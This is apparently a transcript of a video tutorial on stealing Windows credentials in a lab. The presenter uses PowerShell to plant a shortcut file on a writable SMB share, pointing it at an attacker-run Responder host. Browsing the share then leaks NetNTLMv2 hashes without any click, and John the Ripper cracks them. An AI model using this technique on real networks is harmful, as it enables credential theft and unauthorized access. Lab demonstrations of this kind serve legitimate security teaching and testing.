Hey everybody, in this video what we're going to do is we're going to go over how responder can be used without clicking. So what we're going to do is we're going to create a share here, and this is going to be actually on the domain controller. Now you wouldn't normally do this. Go in here, new folder, we'll call this share. Oops, I'm still typing over there. We'll call this shared, or let's just call it file 02. Good enough. Okay, so we should put something in there. Let's create some documents. New text document, test 1. New text document again, test 2. Okay, so we got 2 test files in there. And now what we want to do is we want to make sure this file is shared. So let's go into here, properties, sharing. And what we'll do is we'll share this with everyone. And we'll give them read write. Now, this is not a good idea. So share that. Well, I mean, actually, it's not a bad idea because DC1 file 2, that's the name. Because really, we're going to control the shares with NTFS. So the NTFS file permissions will still be in effect, and they're in effect right now. So if we go to shares file 2, now we're going to change those, though, to open this up. Now this, not a good idea. So everyone, security, everyone, full control. So that's our NTFS. So it actually gave NTFS permissions to everyone, just creating that file. That's great. Okay, that's pretty nice. Let's try this. What we'll do is we'll turn on responder. There we go. Okay, responder's running here, and we'll just go to file 2. So this shouldn't cause any issues. Let's cancel that. And we'll just go backslash file 02. Actually, there's no such thing. So I typed it in wrong, so that's going to show you file 02. That shows you this is an issue. They've already got my credentials. Okay, so here we see file 02. You didn't see anything come up here because it answered, everything was good. So test 1, test 2. Okay, let's close that now. And what we'll do is we're going to go on here and we're going to create a shortcut. So this is how we're going to do it this time. And this is pretty interesting how we can do this. So what we're going to do is open PowerShell. Okay, so object shell. Well, let's go to CD. Let's CD into that folder. So that was shared, I think. File 2. LL. You always do that on Windows, and that does not work on Windows. Unless you create an alias, I guess. dir. There's test 1, test 2. Okay, so here's what we're going to do. We're going to create a link. Object shell equals new object com object wscript dot shell. Okay, link equals object shell dot create there. That's what we want, create shortcut. And we'll call this C shared file 02. And we're going to call this malicious.lnk. Okay. And I forgot to close that. Let's close that. Okay, perfect. So lnk dot target path equals // DC1. So we're going to do DC1 shared and what we're going to do is at threat.png. Okay. DC1 shared. That looks good. Link.windowStyle equals 1. Link.icon location equals %windir %system 32 shell 32.dll, comma 3. There we go. And $link.description. And this will just be link to enable LLMNR harvesting. Okay, did not like that. Okay, what does it not like there? So I must have put something in there I didn't mean to. What did I don't see anything. Ah, I didn't put the equal sign. That's it. Okay. Makes sense. Okay. And then link dot hotkey equals control plus alt plus O. And $lnk dot save. Because it's shares. Let's get that right. Oops. Let's fix this. So I got a typo there. So that should be shares. Hit that. And let's see if that works. Oh, I forgot. There's another place, target path. And there's also, where is it? There it is. So that should be shares. Okay. All right, so now we should be able to save it. And let's see if it's saved in here in file 2. And there you can see it. All right, so that should redirect to this folder. All right, so now what we should be able to do is let's go here. So this is the victim machine. And what we're going to do is we're just going to open up this share, DC1 file 2. And what we should see, without even touching this, so why didn't that open? You know what? I'll tell you why not. Let's delete this. Close this out. That's my mistake here. I've got to redirect it to this machine here. So let me open this up and get the IP address. So this is 70.25. So, okay. So the link, that's right. The link.target path has to be this is going to be the place where we want to redirect them. So 10.150.70.25. So that's what we want to do. So that's the correct way. Let's see if we can save that link. All right, so that was my mistake there, because what we're doing basically is saying this malicious is pointing towards 10.150, the responder IP. Okay. So now is the time where we're gonna actually see this work. So if we go in here, 10.150, now we're just gonna go to this DC1 file 2. Well, let's restart. I didn't see anything happen there. So what I want to do is I want to actually restart this. All right, let's restart this. So okay, stopped responder. Let's restart responder. All right. So now let's try this. Let's browse to this and see if it works correctly. But what we should see here is that without clicking anything, just going to this share gives our credentials. So I don't see anything happening there. .150.70.25. That's correct. So I'm not seeing it doing anything here. Let's see why that is. Control C, DIR, LL. Okay, it looks like we caught some information here. All right, let's get rid of these. Sudo rm SMB. Let's get rid of all the other ones we have. Just make sure. LL. Okay, we got rid of all those. Let's restart this. So we got responder running. Close this out. And without hitting anything, let's just make sure that we see something coming in. Okay, Control C. We're not seeing the malicious file create anything. All right, let's figure out what is going on. Okay, I think I see the issue here. I think that the icon location was not correct there. So let's do this again. And let's see if we get this working. Okay. We're going to go to DC1 file 2. All right, I don't see anything happening. We also don't have hotkey. See if that is not why that didn't show up. Oh, well, I did not recreate. Okay, all control. So now we have the hotkey. I did not recreate the link, so let's do that. So what we'll do is I will shut that down. I'm going to shut this down. I'm going to go back to that folder, which is in shares. Okay, file 2. And we'll delete that link. Okay. Let's recreate that link again. Okay, there we have a new link right there. Now we will close that. I'm going to start responder again. And hopefully this time we actually get a hit here. All right, so we're not seeing that hit. Okay, let me take a look and see what is going on here. Okay, so it looks like it's working. It's just not showing anything in the responder interface. So let's take a look at it. So what I did was I deleted all the responder logs. If we look in here, there's let's do an LL here. So there's nothing there. No responder logs. All right, so let's try this again. I'm going to start responder. Okay, so there it is. Responder started. Someone comes in, goes to this share. So this has to be a share that you can write to, right? So you'd have to have write permission to this share. Everyone would have to have write permission for you to be able to get in there and write to it. Or if you've stolen credentials and that user has write, that would be fine also. But let's see, DC file. There we are. We've opened it. We have not we haven't clicked on that malicious file. We just opened it. So I'm going to stop responder, do an LL, and there you see we have the credential file. And then if we run John the Ripper, and net NTLM v2 and the SMB file right there. There you can see we've gotten the file, the password of that user. So yeah, it just wasn't showing me the information, but it was working the whole time. So that's kind of scary. There's no interaction, right? There's no interaction. You leave that file there, and you leave responder running, and you can capture, many different hashes, and then go through and try to crack them. And you can also use a much more advanced password cracker, use, Hashcat with GPUs, and you can probably get most passwords as long as they're not, 20 characters or more, which almost no one does. I mean, I don't know how many companies actually do that because it gets a little bit annoying for the employees. So that's how you would crack that and put a malicious link right up there in in a folder in a sheriff, and then anyone who goes to there they're gonna automatically connect to your responder and give credentials. All right, so thanks for watching. I appreciate it.